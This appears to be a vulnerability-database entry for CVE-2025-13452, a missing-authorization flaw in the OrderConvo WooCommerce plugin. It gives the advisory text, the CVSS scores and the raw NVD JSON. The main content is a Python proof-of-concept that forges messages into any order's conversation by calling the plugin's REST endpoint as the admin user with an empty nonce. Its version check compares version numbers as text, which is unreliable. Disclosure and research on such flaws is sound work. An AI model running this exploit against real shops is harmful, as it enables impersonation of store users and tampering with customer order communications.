Security Vulnerability Report
中文
CVE-2025-13452 CVSS 4.3 MEDIUM

CVE-2025-13452

Published: 2025-11-25 08:15:52
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 14. This is due to a flawed permission check in the REST API permission callback that returns true when no nonce is provided. This makes it possible for unauthenticated attackers to impersonate any WordPress user and inject arbitrary messages into any WooCommerce order conversation by directly calling the REST endpoint with controlled user_id, order_id, and context parameters.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

OrderConvo (Admin and Customer Messages After Order for WooCommerce) <= 14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-13452 PoC - Unauthenticated Message Injection # Target: WordPress site with OrderConvo plugin <= 14 # Impact: Allows unauthenticated attackers to inject messages into any WooCommerce order TARGET_URL = "https://vulnerable-site.com" def exploit_message_injection(): """ Exploit the missing authorization vulnerability in OrderConvo plugin. This PoC demonstrates how an unauthenticated attacker can inject arbitrary messages into any WooCommerce order conversation. """ # REST API endpoint for message injection endpoint = f"{TARGET_URL}/wp-json/orderconvo/v1/messages" # Malicious payload - attacker controls user_id, order_id, and message content payload = { "user_id": 1, # Impersonate admin user (user_id=1) "order_id": 123, # Target any WooCommerce order "context": "customer", # Set context to customer or admin "message": "This is a malicious message injected by attacker" } headers = { "Content-Type": "application/json", "X-WP-Nonce": "" # Empty nonce - permission callback returns true } print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Exploiting endpoint: {endpoint}") print(f"[*] Injecting message as user_id={payload['user_id']} to order_id={payload['order_id']}") try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code in [200, 201]: print("[+] SUCCESS: Message injection completed!") print(f"[+] Response: {response.text}") else: print(f"[-] Failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def check_plugin_version(): """ Check if the vulnerable plugin version is installed. """ endpoint = f"{TARGET_URL}/wp-json/wp/v2/plugins?search=orderconvo" try: response = requests.get(endpoint, timeout=10) if response.status_code == 200: plugins = response.json() for plugin in plugins: if 'orderconvo' in plugin.get('name', '').lower(): version = plugin.get('version', 'unknown') print(f"[*] Found plugin version: {version}") if version <= '14': print("[!] Plugin is VULNERABLE!") return version except: pass print("[*] Could not determine plugin version") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-13452 - OrderConvo Unauthorized Message Injection") print("=" * 60) # First check plugin version check_plugin_version() # Attempt exploitation exploit_message_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13452", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:51.740", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 14. This is due to a flawed permission check in the REST API permission callback that returns true when no nonce is provided. This makes it possible for unauthenticated attackers to impersonate any WordPress user and inject arbitrary messages into any WooCommerce order conversation by directly calling the REST endpoint with controlled user_id, order_id, and context parameters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L113", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L56", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L113", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L56", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3439999/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c1dd87c-cc28-43b3-8378-4583dc6de195?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.